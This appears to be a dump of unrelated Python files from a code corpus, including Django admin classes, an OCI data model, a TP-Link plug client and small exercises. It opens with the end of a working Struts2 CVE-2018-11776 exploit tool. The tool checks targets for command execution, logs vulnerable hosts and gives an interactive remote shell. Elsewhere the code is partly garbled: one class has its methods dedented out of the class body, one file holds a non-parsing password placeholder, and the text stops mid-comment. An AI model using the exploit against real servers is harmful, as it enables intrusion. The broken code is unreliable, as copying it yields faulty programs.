        print(BLUE+" [-] NO VULNERABLE"+ENDC)
        print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
        x = 0
        while x < len(validador()):
            # Keep only the scheme+domain part of the url.
            url = host.replace('#', '%23')
            # NOTE(review): bug — this re-reads *host* and so discards the
            # previous line's '#' escaping; should be url.replace(' ', '%20').
            url = host.replace(' ', '%20')
            if ('://' not in url):
                url = str("http://") + str(url)
            scheme = urllib.parse.urlparse(url).scheme
            site = scheme + '://' + urllib.parse.urlparse(url).netloc
            # Keep only the path part of the url.
            file_path = urllib.parse.urlparse(url).path
            if (file_path == ''):
                file_path = '/'
            valida = validador()[x]
            try:
                result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
                if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
                    print(RED+" [-] VULNERABLE"+ENDC)
                    owned = open('vulnsite.txt', 'a')
                    owned.write(str(host)+'\n')
                    owned.close()
                    opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
                    if opcion == 's':
                        print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
                        time.sleep(1)
                        print(BOLD+" * [UPLOAD SHELL]"+ENDC)
                        print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
                        while 1:
                            separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
                            espacio = separador.split(' ')
                            comando = "%20".join(espacio)
                            shell = urllib.request.urlopen(host+exploit3(str(comando)))
                            print("\n"+shell.read())
                    else:
                        x = len(validador())
                        exit(0)
                else:
                    print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
            except:
                pass
            x=x+1
    else:
        print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC)
        exit(0)
else:
    print(RED+" Debe Ingresar una Url\n"+ENDC)
    exit(0)
| StarcoderdataPython |
1754270 | ### Exercicio 4 e 5
def primo(v):
    """Return True if *v* is a prime number, False otherwise.

    Bug fix: the original returned True for 0 and 1 (and all values < 2),
    which are not prime.  Trial division now also stops at sqrt(v) instead
    of v // 2 — a divisor above the square root implies one below it.
    """
    if v < 2:
        return False
    for i in range(2, int(v ** 0.5) + 1):
        if v % i == 0:
            return False
    return True
### Exercise 4
# Read one number and report whether it is prime.
valor = int(input("Digite um valor: "))
if primo(valor): print(f"{valor} e primo!")
else: print(f"{valor} nao e primo!")

print("\n\n")

### Exercise 5
# List every prime from 2 up to the user-supplied limit (inclusive).
f = int(input("Digite o valor do final da contagem: "))
primos = []
for i in range(2,f+1):
    if primo(i): primos.append(i)
print("Os valores primos sao: ",*primos)
| StarcoderdataPython |
3336673 | from pygbif import species
from .format_helpers import _make_id
def gbif_query_for_single_name(name, rank):
    """Query the GBIF species API for *name* at taxonomic *rank*.

    Returns the raw list of result dicts from pygbif's ``name_usage``
    (rank is upper-cased as the GBIF API expects, e.g. 'GENUS').
    """
    response = species.name_usage(name=name, rank=rank.upper())["results"]
    return response
def process_gbif_response(list_of_response_dicts, rank):
    """Convert raw GBIF result dicts into internal id records via _make_id.

    For each result, the numeric key is read from '<rank>Key' and the name
    from '<rank>'; missing entries fall back to None.
    """
    id_key = rank + "Key"
    return [
        _make_id(record.get(id_key), record.get(rank), rank, "gbif")
        for record in list_of_response_dicts
    ]
| StarcoderdataPython |
1723968 | from django.contrib import admin
from imagekit.admin import AdminThumbnail
from common.admin import AutoUserMixin
from shapes.models import SubmittedShape, \
MaterialShape, ShapeSubstance, ShapeSubstanceLabel, \
ShapeName, MaterialShapeNameLabel, MaterialShapeQuality
from normals.models import ShapeRectifiedNormalLabel
from bsdfs.models import ShapeBsdfLabel_mf, ShapeBsdfLabel_wd
# inlines
class ShapeLabelInlineBase(AutoUserMixin, admin.TabularInline):
    """Common base for shape-label inlines: one extra blank row, auto-set user."""
    extra = 1
class ShapeAdmin(AutoUserMixin, admin.ModelAdmin):
    """Base admin for shape models: thumbnails, filtering and search."""
    fieldsets = [
        (None, {
            'fields': ['added', 'photo', 'user', 'vertices', 'num_vertices']
        }),
    ]
    readonly_fields = ['added', 'admin_thumb_span6']
    list_display = ['user', 'admin_thumb_span1', 'added', 'num_vertices']
    list_filter = ['added', 'correct', 'planar']
    search_fields = ['user', 'photo']
    date_hierarchy = 'added'
    # Thumbnails rendered from the model's ImageKit spec fields.
    admin_thumb_span6 = AdminThumbnail(image_field='image_span6')
    admin_thumb_span1 = AdminThumbnail(image_field='thumb_span1')
class MaterialShapeAdmin(ShapeAdmin):
    """Admin for MaterialShape with inline editing of every label type."""

    class SubmittedShapeInline(ShapeLabelInlineBase):
        model = SubmittedShape

    class ShapeSubstanceLabelInline(ShapeLabelInlineBase):
        model = ShapeSubstanceLabel

    class ShapeBsdfLabelInline_mf(ShapeLabelInlineBase):
        model = ShapeBsdfLabel_mf

    class ShapeBsdfLabelInline_wd(ShapeLabelInlineBase):
        model = ShapeBsdfLabel_wd

    class ShapeRectifiedNormalLabelInline(ShapeLabelInlineBase):
        model = ShapeRectifiedNormalLabel

    inlines = [SubmittedShapeInline,
               ShapeSubstanceLabelInline,
               ShapeBsdfLabelInline_mf,
               ShapeBsdfLabelInline_wd,
               ShapeRectifiedNormalLabelInline]

admin.site.register(MaterialShape, MaterialShapeAdmin)
class SubmittedShapeAdmin(AutoUserMixin, admin.ModelAdmin):
    """Default admin for SubmittedShape (user auto-set on save)."""
    pass

admin.site.register(SubmittedShape, SubmittedShapeAdmin)
class ShapeNameAdmin(AutoUserMixin, admin.ModelAdmin):
    """Default admin for ShapeName (user auto-set on save)."""
    pass

admin.site.register(ShapeName, ShapeNameAdmin)
class MaterialShapeNameLabelAdmin(AutoUserMixin, admin.ModelAdmin):
    """Default admin for MaterialShapeNameLabel (user auto-set on save)."""
    pass

admin.site.register(MaterialShapeNameLabel, MaterialShapeNameLabelAdmin)
class ShapeSubstanceAdmin(AutoUserMixin, admin.ModelAdmin):
    """Default admin for ShapeSubstance (user auto-set on save)."""
    pass

admin.site.register(ShapeSubstance, ShapeSubstanceAdmin)
class ShapeSubstanceLabelAdmin(AutoUserMixin, admin.ModelAdmin):
    """Default admin for ShapeSubstanceLabel (user auto-set on save)."""
    pass

admin.site.register(ShapeSubstanceLabel, ShapeSubstanceLabelAdmin)
class MaterialShapeQualityAdmin(AutoUserMixin, admin.ModelAdmin):
    """Default admin for MaterialShapeQuality (user auto-set on save)."""
    pass

admin.site.register(MaterialShapeQuality, MaterialShapeQualityAdmin)
| StarcoderdataPython |
1639780 | <gh_stars>0
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class Sighting(object):
"""
Sighting details.
"""
#: A constant which can be used with the classification_status property of a Sighting.
#: This constant has a value of "FALSE_POSITIVE"
CLASSIFICATION_STATUS_FALSE_POSITIVE = "FALSE_POSITIVE"
#: A constant which can be used with the classification_status property of a Sighting.
#: This constant has a value of "FALSE_NEGATIVE"
# Allowed values for the ``classification_status`` property of a Sighting.
CLASSIFICATION_STATUS_FALSE_NEGATIVE = "FALSE_NEGATIVE"
CLASSIFICATION_STATUS_TRUE_POSITIVE = "TRUE_POSITIVE"
CLASSIFICATION_STATUS_TRUE_NEGATIVE = "TRUE_NEGATIVE"
CLASSIFICATION_STATUS_NOT_CLASSIFIED = "NOT_CLASSIFIED"

# Allowed values for the ``severity`` property of a Sighting.
SEVERITY_CRITICAL = "CRITICAL"
SEVERITY_HIGH = "HIGH"
SEVERITY_MEDIUM = "MEDIUM"
SEVERITY_LOW = "LOW"
SEVERITY_MINOR = "MINOR"

# Allowed values for the ``confidence`` property of a Sighting.
CONFIDENCE_CRITICAL = "CRITICAL"
CONFIDENCE_HIGH = "HIGH"
CONFIDENCE_MEDIUM = "MEDIUM"
CONFIDENCE_LOW = "LOW"
CONFIDENCE_MINOR = "MINOR"

def __init__(self, **kwargs):
    """
    Initializes a new Sighting object with values from keyword arguments.

    Supported kwargs (one per property of this class):
    id (str), description (str), problem_id (str), compartment_id (str),
    actor_principal_id (str), actor_principal_name (str),
    actor_principal_type (str), classification_status (str, one of
    "FALSE_POSITIVE", "FALSE_NEGATIVE", "TRUE_POSITIVE", "TRUE_NEGATIVE",
    "NOT_CLASSIFIED"; unrecognized service values map to
    'UNKNOWN_ENUM_VALUE'), sighting_type (str),
    sighting_type_display_name (str), tactic_name (str),
    technique_name (str), sighting_score (int), severity (str) and
    confidence (str) (both one of "CRITICAL", "HIGH", "MEDIUM", "LOW",
    "MINOR"; unrecognized service values map to 'UNKNOWN_ENUM_VALUE'),
    time_first_detected (datetime), time_last_detected (datetime),
    regions (list[str]), additional_details (dict(str, str)).
    """
    # Swagger type of each python attribute, used for (de)serialization.
    self.swagger_types = {
        'id': 'str',
        'description': 'str',
        'problem_id': 'str',
        'compartment_id': 'str',
        'actor_principal_id': 'str',
        'actor_principal_name': 'str',
        'actor_principal_type': 'str',
        'classification_status': 'str',
        'sighting_type': 'str',
        'sighting_type_display_name': 'str',
        'tactic_name': 'str',
        'technique_name': 'str',
        'sighting_score': 'int',
        'severity': 'str',
        'confidence': 'str',
        'time_first_detected': 'datetime',
        'time_last_detected': 'datetime',
        'regions': 'list[str]',
        'additional_details': 'dict(str, str)'
    }
    # Maps each python attribute name to its JSON (camelCase) field name.
    self.attribute_map = {
        'id': 'id',
        'description': 'description',
        'problem_id': 'problemId',
        'compartment_id': 'compartmentId',
        'actor_principal_id': 'actorPrincipalId',
        'actor_principal_name': 'actorPrincipalName',
        'actor_principal_type': 'actorPrincipalType',
        'classification_status': 'classificationStatus',
        'sighting_type': 'sightingType',
        'sighting_type_display_name': 'sightingTypeDisplayName',
        'tactic_name': 'tacticName',
        'technique_name': 'techniqueName',
        'sighting_score': 'sightingScore',
        'severity': 'severity',
        'confidence': 'confidence',
        'time_first_detected': 'timeFirstDetected',
        'time_last_detected': 'timeLastDetected',
        'regions': 'regions',
        'additional_details': 'additionalDetails'
    }
    # Backing fields for the properties below; populated via the setters.
    self._id = None
    self._description = None
    self._problem_id = None
    self._compartment_id = None
    self._actor_principal_id = None
    self._actor_principal_name = None
    self._actor_principal_type = None
    self._classification_status = None
    self._sighting_type = None
    self._sighting_type_display_name = None
    self._tactic_name = None
    self._technique_name = None
    self._sighting_score = None
    self._severity = None
    self._confidence = None
    self._time_first_detected = None
    self._time_last_detected = None
    self._regions = None
    self._additional_details = None
@property
def id(self):
    """**[Required]** Unique identifier for the sighting event (str)."""
    return self._id

@id.setter
def id(self, id):
    """Sets the id of this Sighting (str)."""
    self._id = id

@property
def description(self):
    """**[Required]** Description of the sighting event (str)."""
    return self._description

@description.setter
def description(self, description):
    """Sets the description of this Sighting (str)."""
    self._description = description

@property
def problem_id(self):
    """Problem Id to which the Sighting is associated (str, optional)."""
    return self._problem_id

@problem_id.setter
def problem_id(self, problem_id):
    """Sets the problem_id of this Sighting (str)."""
    self._problem_id = problem_id

@property
def compartment_id(self):
    """**[Required]** Compartment Id where the resource is created (str)."""
    return self._compartment_id

@compartment_id.setter
def compartment_id(self, compartment_id):
    """Sets the compartment_id of this Sighting (str)."""
    self._compartment_id = compartment_id

@property
def actor_principal_id(self):
    """Unique identifier for the principal actor (str, optional)."""
    return self._actor_principal_id

@actor_principal_id.setter
def actor_principal_id(self, actor_principal_id):
    """Sets the actor_principal_id of this Sighting (str)."""
    self._actor_principal_id = actor_principal_id

@property
def actor_principal_name(self):
    """Name of the principal actor (str, optional)."""
    return self._actor_principal_name

@actor_principal_name.setter
def actor_principal_name(self, actor_principal_name):
    """Sets the actor_principal_name of this Sighting (str)."""
    self._actor_principal_name = actor_principal_name

@property
def actor_principal_type(self):
    """Type of the principal actor (str, optional)."""
    return self._actor_principal_type

@actor_principal_type.setter
def actor_principal_type(self, actor_principal_type):
    """Sets the actor_principal_type of this Sighting (str)."""
    self._actor_principal_type = actor_principal_type
@property
def classification_status(self):
    """**[Required]** ClassificationStatus of the sighting event (str).

    One of "FALSE_POSITIVE", "FALSE_NEGATIVE", "TRUE_POSITIVE",
    "TRUE_NEGATIVE", "NOT_CLASSIFIED"; any unrecognized value returned by
    the service is mapped to 'UNKNOWN_ENUM_VALUE'.
    """
    return self._classification_status

@classification_status.setter
def classification_status(self, classification_status):
    """Sets the classification_status of this Sighting (str)."""
    allowed_values = ["FALSE_POSITIVE", "FALSE_NEGATIVE", "TRUE_POSITIVE", "TRUE_NEGATIVE", "NOT_CLASSIFIED"]
    # Coerce values outside the known enum to the UNKNOWN sentinel instead
    # of raising, so newer service values do not break older clients.
    if not value_allowed_none_or_none_sentinel(classification_status, allowed_values):
        classification_status = 'UNKNOWN_ENUM_VALUE'
    self._classification_status = classification_status

@property
def sighting_type(self):
    """**[Required]** Identifier for the sighting type (str)."""
    return self._sighting_type

@sighting_type.setter
def sighting_type(self, sighting_type):
    """Sets the sighting_type of this Sighting (str)."""
    self._sighting_type = sighting_type

@property
def sighting_type_display_name(self):
    """**[Required]** Display name of the sighting type (str)."""
    return self._sighting_type_display_name

@sighting_type_display_name.setter
def sighting_type_display_name(self, sighting_type_display_name):
    """Sets the sighting_type_display_name of this Sighting (str)."""
    self._sighting_type_display_name = sighting_type_display_name

@property
def tactic_name(self):
    """**[Required]** Name of the Mitre att&ck tactic (str)."""
    return self._tactic_name

@tactic_name.setter
def tactic_name(self, tactic_name):
    """Sets the tactic_name of this Sighting (str)."""
    self._tactic_name = tactic_name

@property
def technique_name(self):
    """**[Required]** Name of the Mitre att&ck technique (str)."""
    return self._technique_name

@technique_name.setter
def technique_name(self, technique_name):
    """Sets the technique_name of this Sighting (str)."""
    self._technique_name = technique_name

@property
def sighting_score(self):
    """**[Required]** Score for the sighting (int)."""
    return self._sighting_score

@sighting_score.setter
def sighting_score(self, sighting_score):
    """Sets the sighting_score of this Sighting (int)."""
    self._sighting_score = sighting_score
@property
def severity(self):
    """**[Required]** Severity of the sighting (str).

    One of "CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR"; any unrecognized
    value returned by the service is mapped to 'UNKNOWN_ENUM_VALUE'.
    """
    return self._severity

@severity.setter
def severity(self, severity):
    """Sets the severity of this Sighting (str)."""
    allowed_values = ["CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR"]
    # Unknown enum values are coerced rather than rejected (forward compat).
    if not value_allowed_none_or_none_sentinel(severity, allowed_values):
        severity = 'UNKNOWN_ENUM_VALUE'
    self._severity = severity

@property
def confidence(self):
    """**[Required]** Confidence of the sighting (str).

    One of "CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR"; any unrecognized
    value returned by the service is mapped to 'UNKNOWN_ENUM_VALUE'.
    """
    return self._confidence

@confidence.setter
def confidence(self, confidence):
    """Sets the confidence of this Sighting (str)."""
    allowed_values = ["CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR"]
    # Unknown enum values are coerced rather than rejected (forward compat).
    if not value_allowed_none_or_none_sentinel(confidence, allowed_values):
        confidence = 'UNKNOWN_ENUM_VALUE'
    self._confidence = confidence

@property
def time_first_detected(self):
    """**[Required]** When the sighting was first detected (datetime, RFC3339)."""
    return self._time_first_detected

@time_first_detected.setter
def time_first_detected(self, time_first_detected):
    """Sets the time_first_detected of this Sighting (datetime)."""
    self._time_first_detected = time_first_detected

@property
def time_last_detected(self):
    """**[Required]** When the sighting was last detected (datetime, RFC3339)."""
    return self._time_last_detected

@time_last_detected.setter
def time_last_detected(self, time_last_detected):
    """Sets the time_last_detected of this Sighting (datetime)."""
    self._time_last_detected = time_last_detected

@property
def regions(self):
    """**[Required]** Regions involved in the sighting (list[str])."""
    return self._regions

@regions.setter
def regions(self, regions):
    """Sets the regions of this Sighting (list[str])."""
    self._regions = regions

@property
def additional_details(self):
    """The additional details of the Sighting (dict(str, str), optional)."""
    return self._additional_details

@additional_details.setter
def additional_details(self, additional_details):
    """Sets the additional_details of this Sighting (dict(str, str))."""
    self._additional_details = additional_details

def __repr__(self):
    return formatted_flat_dict(self)

def __eq__(self, other):
    # Attribute-wise equality; None never compares equal to a Sighting.
    if other is None:
        return False
    return self.__dict__ == other.__dict__

def __ne__(self, other):
    return not self == other
| StarcoderdataPython |
90108 | <reponame>Y-Kuro-u/chariot
import os
import mmap
from chariot.util import xtqdm
class DataFile():
    """A data file whose name encodes attributes as ``name__attr1__attr2.ext``."""

    def __init__(self, path, encoding="utf-8"):
        self.path = path
        self.encoding = encoding
        file_name = os.path.basename(path)
        base_name, ext = os.path.splitext(file_name)
        self.base_name = base_name
        self.ext = ext

    def exists(self):
        """Return True when the file is present on disk."""
        return os.path.exists(self.path)

    def convert(self, data_dir_to="", add_attribute="",
                attribute_to=(), ext_to=""):
        """Derive a new DataFile with a changed directory, attributes or extension.

        Args:
            data_dir_to: sibling data directory name to relocate into.
            add_attribute: attribute appended to the file name.
            attribute_to: mapping of existing attribute -> replacement
                (only consulted when ``add_attribute`` is not given).
            ext_to: replacement extension (including the leading dot).

        Returns:
            A new instance of the same class pointing at the derived path.
        """
        _dir = os.path.dirname(self.path)
        elements = self._elements()
        ext = self.ext
        if data_dir_to:
            _dir = os.path.join(_dir, "../" + data_dir_to)
        if add_attribute:
            elements.append(add_attribute)
        elif len(attribute_to) > 0:
            # File name format is name + "__".join(attributes),
            # so the attribute part is elements[1:].
            for a in attribute_to:
                if a in elements[1:]:
                    index = elements[1:].index(a)
                    elements[1 + index] = attribute_to[a]
        if ext_to:
            ext = ext_to
        base_name = "__".join(elements)
        new_path = os.path.join(_dir, base_name + ext)
        return self.__class__(new_path)

    @property
    def name(self):
        """File name without attributes or extension."""
        # BUG FIX: _elements is a method; the original subscripted the bound
        # method object itself, which raises TypeError. Call it first.
        return self._elements()[0]

    @property
    def attributes(self):
        """List of attributes encoded in the file name."""
        # BUG FIX: call _elements() before slicing (see ``name``).
        return self._elements()[1:]

    def _elements(self):
        # Split "name__attr1__attr2" into ["name", "attr1", "attr2"].
        elements = self.base_name.split("__")
        return elements

    def get_line_count(self):
        """Count the lines of the file via mmap without reading it into memory."""
        count = 0
        with open(self.path, "r+") as f:
            buf = mmap.mmap(f.fileno(), 0)
            try:
                while buf.readline():
                    count += 1
            finally:
                # Release the mapping explicitly instead of leaking it.
                buf.close()
        return count

    def fetch(self, progress=False):
        """Yield stripped lines, optionally wrapped in an xtqdm progress bar."""
        total_count = 0
        if progress:
            total_count = self.get_line_count()
        with open(self.path, encoding=self.encoding) as f:
            iterator = f
            if progress:
                iterator = xtqdm(f, total=total_count)
            for line in iterator:
                yield line.strip()

    def to_array(self):
        """Read the whole file into a list of stripped lines."""
        with open(self.path, encoding=self.encoding) as f:
            lines = f.readlines()
        return [ln.strip() for ln in lines]
| StarcoderdataPython |
1686876 | <filename>env/Lib/site-packages/anyio/_core/_signals.py
from typing import AsyncIterator
from ._compat import DeprecatedAsyncContextManager
from ._eventloop import get_asynclib
def open_signal_receiver(*signals: int) -> DeprecatedAsyncContextManager[AsyncIterator[int]]:
    """Begin delivery of operating system signals to the caller.

    :param signals: the signals to listen for (e.g. ``signal.SIGINT``)
    :return: an async context manager yielding an async iterator of signal
        numbers

    .. warning:: Signals are not natively supported on Windows, so portable
        applications should avoid depending on this function.

    .. warning:: On asyncio, any handler previously installed for these
        signals via :meth:`~asyncio.loop.add_signal_handler` is permanently
        replaced.
    """
    backend = get_asynclib()
    return backend.open_signal_receiver(*signals)
| StarcoderdataPython |
1774235 | from django.contrib import admin
from .models import User
# Register the custom User model with the default admin site so it can be
# managed through the Django admin interface.
admin.site.register(User)
1663595 | <filename>scripts/flowpusher_demo.py
import httplib
import json
class StaticFlowPusher(object):
    """Thin Python 2 client for the Floodlight static flow pusher REST API.

    All calls target ``/wm/staticflowentrypusher/json`` on port 8080 of the
    controller host given at construction time.
    """

    def __init__(self, server):
        # Controller host name or IP address.
        self.server = server

    def get(self, data):
        # NOTE(review): `data` is accepted but never used -- the GET always
        # sends an empty body. Confirm whether a filtered query was intended.
        ret = self.rest_call({}, 'GET')
        return json.loads(ret[2])

    def set(self, data):
        # Push a static flow entry; True when the controller returns 200.
        ret = self.rest_call(data, 'POST')
        return ret[0] == 200

    def remove(self, objtype, data):
        # NOTE(review): `objtype` is accepted but never used; verify against
        # the intended API shape.
        ret = self.rest_call(data, 'DELETE')
        return ret[0] == 200

    def rest_call(self, data, action):
        """Issue one HTTP request and return (status, reason, body)."""
        path = '/wm/staticflowentrypusher/json'
        headers = {
            'Content-type': 'application/json',
            'Accept': 'application/json',
        }
        body = json.dumps(data)
        conn = httplib.HTTPConnection(self.server, 8080)
        conn.request(action, path, body, headers)
        response = conn.getresponse()
        ret = (response.status, response.reason, response.read())
        print ret
        conn.close()
        return ret
# Instantiate the pusher against the Floodlight controller's REST endpoint.
pusher = StaticFlowPusher('172.16.31.10') #controller ip

# Flow 1: on switch 00:..:01, forward traffic arriving on port 1 out port 2.
flow1 = {
    'switch':"00:00:00:00:00:00:00:01",
    "name":"flow-mod-1",
    "cookie":"0",
    "priority":"32768",
    "ingress-port":"1",
    "active":"true",
    "actions":"output=2"
}

# Flow 2: flood traffic arriving on port 2.
flow2 = {
    'switch':"00:00:00:00:00:00:00:01",
    "name":"flow-mod-2",
    "cookie":"0",
    "priority":"32768",
    "ingress-port":"2",
    "active":"true",
    "actions":"output=flood"
}

# Flow 3: flood traffic arriving on port 3.
flow3 = {
    'switch':"00:00:00:00:00:00:00:01",
    "name":"flow-mod-3",
    "cookie":"0",
    "priority":"32768",
    "ingress-port":"3",
    "active":"true",
    "actions":"output=flood"
}

# Install all three static flow entries on the controller.
pusher.set(flow1)
pusher.set(flow2)
pusher.set(flow3)
3329030 | <gh_stars>0
from main import Link, Event
from . import BaseTest
class TestViewHandlers(BaseTest):
    """Integration tests for the public site views (run through the webtest app)."""

    def test_index(self):
        # The landing page should render the site title.
        response = self.app.get('/')
        assert 'Zongo' in response

    def test_admin(self):
        response = self.app.get('/admin')
        assert response

    def test_published_link(self):
        # Published links must appear on the front page.
        url = "http://example.com"
        Link(url=url, published=True).put()
        assert url in self.app.get('/')

    def test_atom_feed(self):
        location = 'Somewhere'
        Event(title='foo', date=self.str2date('2009-01-01'), location=location, published=True).put()
        response = self.app.get('/events/atom')
        # Feed entries link to the event's date-slug permalink.
        assert '/events/01-01-2009_foo' in response

    def test_not_published_link(self):
        # Unpublished links are hidden from the public page but still
        # listed in the admin interface.
        url = "http://example.com"
        Link(url=url).put()
        assert url not in self.app.get('/')
        assert url in self.app.get('/admin/links')

    def test_published_event(self):
        location = 'Somewhere'
        Event(title='foo', date=self.str2date('2009-01-01'), location=location, published=True).put()
        response = self.app.get('/')
        assert location in response

    def test_not_published_event(self):
        # Same visibility rule as links, applied to events.
        location = 'Somewhere'
        Event(title='foo', date=self.str2date('2009-01-01'), location=location).put()
        assert location not in self.app.get('/')
        assert location in self.app.get('/admin/events')

    def test_missing_event_page(self):
        # Unknown slugs must 404 (webtest asserts the expected status).
        response = self.app.get('/events/missingapsdjhfaljsk', status=404)

    def test_event_page(self):
        location = 'Somewhere'
        title = "This+is*a;weird Title"
        event = Event(title=title, date=self.str2date('2009-01-31'), location=location,
                      published=True)
        event.put()
        # Non-alphanumeric characters are normalized into the slug.
        slug = "31-01-2009_this-is-a-weird-title"
        self.assertEqual(event.slug, slug)
        response = self.app.get('/events/%s' % slug)
        assert location in response, location + ' should be in ' + response.body

    def test_photo_page_should_have_links(self):
        # The photos page embeds the published links as well.
        url = "http://example.com"
        link = Link(url=url, published=True)
        link.put()
        response = self.app.get('/photos/')
        assert url in response, url + " not found in " + str(response)
class TestAdminHandlers(BaseTest):
    """Integration tests for the admin form handlers."""

    def test_create_event(self):
        # Fill in and submit the "new event" form, then verify the Event
        # entity was stored with the submitted values.
        form = self.app.get('/admin/events/new').form
        form['title'] = 'This is a test event'
        form['date'] = '25/01/2000'
        form['image'] = ('cows.jpg', open('tests/small_cows.jpg').read())
        form['description'] = 'great event'
        form['location'] = 'Tokyo'
        response = form.submit()
        event = Event.gql("WHERE title = :1", 'This is a test event').get()
        self.assertEqual(event.description, 'great event')
        self.assertEqual(event.location, 'Tokyo')
        self.assertEqual(event.date.day, 25)
        assert event.image
| StarcoderdataPython |
1735515 | <filename>Python3/Coursera/others/use_fork_2.py
# Memory of the parent and child processes: after fork() each process has
# an independent copy of the parent's variables.
import os
import time

foo = "bar"

if os.fork() == 0:
    # Child process: mutating `foo` here does not affect the parent's copy.
    foo = "baz"
    print("child:", foo)
else:
    # Parent process: sleep so the child prints first, then show that the
    # parent still sees the original value.
    time.sleep(2)
    print("parent:", foo)
    # Reap the child in the parent only -- calling os.wait() in a process
    # with no children raises ChildProcessError.
    os.wait()
| StarcoderdataPython |
4837779 | <reponame>jttaylor/TPLink-SmartPlug
import json
import urllib2
import uuid
class SmartPlug:
    """Python 2 client for the TP-Link Kasa cloud API (wap.tplinkcloud.com).

    Logs in for a session token, then lists devices and passes relay
    commands through to a device identified by its cloud device id.
    """

    def __init__(self, username, password):
        # Kasa cloud account credentials. The "<PASSWORD>" token below is a
        # redaction placeholder from the published source, not valid code.
        self.username = username
        self.password = password
        # Session token, obtained lazily on first use via GetToken().
        self.token = None
        # Random terminal UUID identifying this client instance.
        self.tp_uuid = str(uuid.uuid4())
        # Login payload reused by GetToken().
        self.login_req = {
            "method": "login",
            "params": {
                "appType": "Kasa_Android",
                "cloudUserName": self.username,
                "cloudPassword": <PASSWORD>,
                "terminalUUID": self.tp_uuid
            }
        }

    def GetToken(self):
        """Log in to the cloud API and cache the session token on self.token."""
        # NOTE(review): the bare except silently swallows every error
        # (network failures, bad credentials); callers cannot tell that
        # login failed except by self.token staying None.
        try:
            req = urllib2.Request('https://wap.tplinkcloud.com')
            req.add_header('Content-Type', 'application/json')
            response = urllib2.urlopen(req, json.dumps(self.login_req))
            txt = response.read()
            jobj = json.loads(txt)
            self.token = jobj["result"]["token"]
        except:
            return

    def PrintDevices(self):
        """Fetch the account's device list and print the raw JSON response."""
        try:
            if self.token is None:
                self.GetToken()
            getDeviceList_req = {"method": "getDeviceList" }
            url = 'https://wap.tplinkcloud.com?token=' + self.token
            req = urllib2.Request(url)
            req.add_header('Content-Type', 'application/json')
            response = urllib2.urlopen(req, json.dumps(getDeviceList_req))
            print response.read()
        except:
            # NOTE(review): bare except hides all failures.
            return

    def GetState(self, device_id):
        """Return the relay state of the device (falls back to 0 on any error)."""
        try:
            if self.token is None:
                self.GetToken()
            status_req = {"method":"passthrough", "params": {"deviceId": device_id, "requestData": "{\"system\":{\"get_sysinfo\":{}}}" }}
            url = 'https://wap.tplinkcloud.com?token=' + self.token
            req = urllib2.Request(url)
            req.add_header('Content-Type', 'application/json')
            response = urllib2.urlopen(req, json.dumps(status_req))
            txt = response.read()
            jobj = json.loads(txt)
            # The device reply is itself a JSON string nested in responseData.
            txt2 = jobj["result"]["responseData"]
            jobj2 = json.loads(txt2)
            return jobj2["system"]["get_sysinfo"]["relay_state"]
        except:
            # NOTE(review): errors are indistinguishable from "relay off".
            return 0

    def TurnOn(self, device_id):
        """Switch the plug's relay on via a passthrough command."""
        try:
            if self.token is None:
                self.GetToken()
            turnOn_req = {"method":"passthrough", "params": {"deviceId": device_id, "requestData": "{\"system\":{\"set_relay_state\":{\"state\":1}}}" }}
            url = 'https://wap.tplinkcloud.com?token=' + self.token
            req = urllib2.Request(url)
            req.add_header('Content-Type', 'application/json')
            response = urllib2.urlopen(req, json.dumps(turnOn_req))
        except:
            return

    def TurnOff(self, device_id):
        """Switch the plug's relay off via a passthrough command."""
        try:
            if self.token is None:
                self.GetToken()
            turnOff_req = {"method":"passthrough", "params": {"deviceId": device_id, "requestData": "{\"system\":{\"set_relay_state\":{\"state\":0}}}" }}
            url = 'https://wap.tplinkcloud.com?token=' + self.token
            req = urllib2.Request(url)
            req.add_header('Content-Type', 'application/json')
            response = urllib2.urlopen(req, json.dumps(turnOff_req))
        except:
            return
74758 | <reponame>arryaaas/Met-Num<gh_stars>0
from app import app
import os
if __name__ == "__main__":
    # Honor the PORT environment variable (e.g. set by the hosting
    # platform), defaulting to 5000 for local development.
    port = int(os.environ.get("PORT", 5000))
    # NOTE(review): debug=True should not be enabled in production --
    # confirm this entry point is only used for local runs.
    app.run(debug=True, port=port)
1756899 | <gh_stars>1000+
# -*- coding: utf-8 -*-
"""Top-level package for Lambda Python Powertools."""
from .logging import Logger # noqa: F401
from .metrics import Metrics, single_metric # noqa: F401
from .package_logger import set_package_logger_handler
from .tracing import Tracer # noqa: F401
__author__ = """Amazon Web Services"""
# Configure the package-level logger handler as an import-time side effect.
set_package_logger_handler()
| StarcoderdataPython |
1773245 | <reponame>pavoljuhas/diffpy.Structure
#!/usr/bin/env python
##############################################################################
#
# diffpy.structure by DANSE Diffraction group
# <NAME>
# (c) 2006 trustees of the Michigan State University.
# All rights reserved.
#
# File coded by: <NAME>
#
# See AUTHORS.txt for a list of people who contributed.
# See LICENSE_DANSE.txt for license information.
#
##############################################################################
"""Exceptions used in Structure package.
"""
class StructureFormatError(Exception):
    """Signals failed input or output of a Structure file."""
class LatticeError(Exception):
    """Signals lattice parameters that cannot form a valid lattice."""
class SymmetryError(Exception):
    """Signals an invalid symmetry operation."""
| StarcoderdataPython |
# NOTE(review): hard-coded account credentials. The values below are
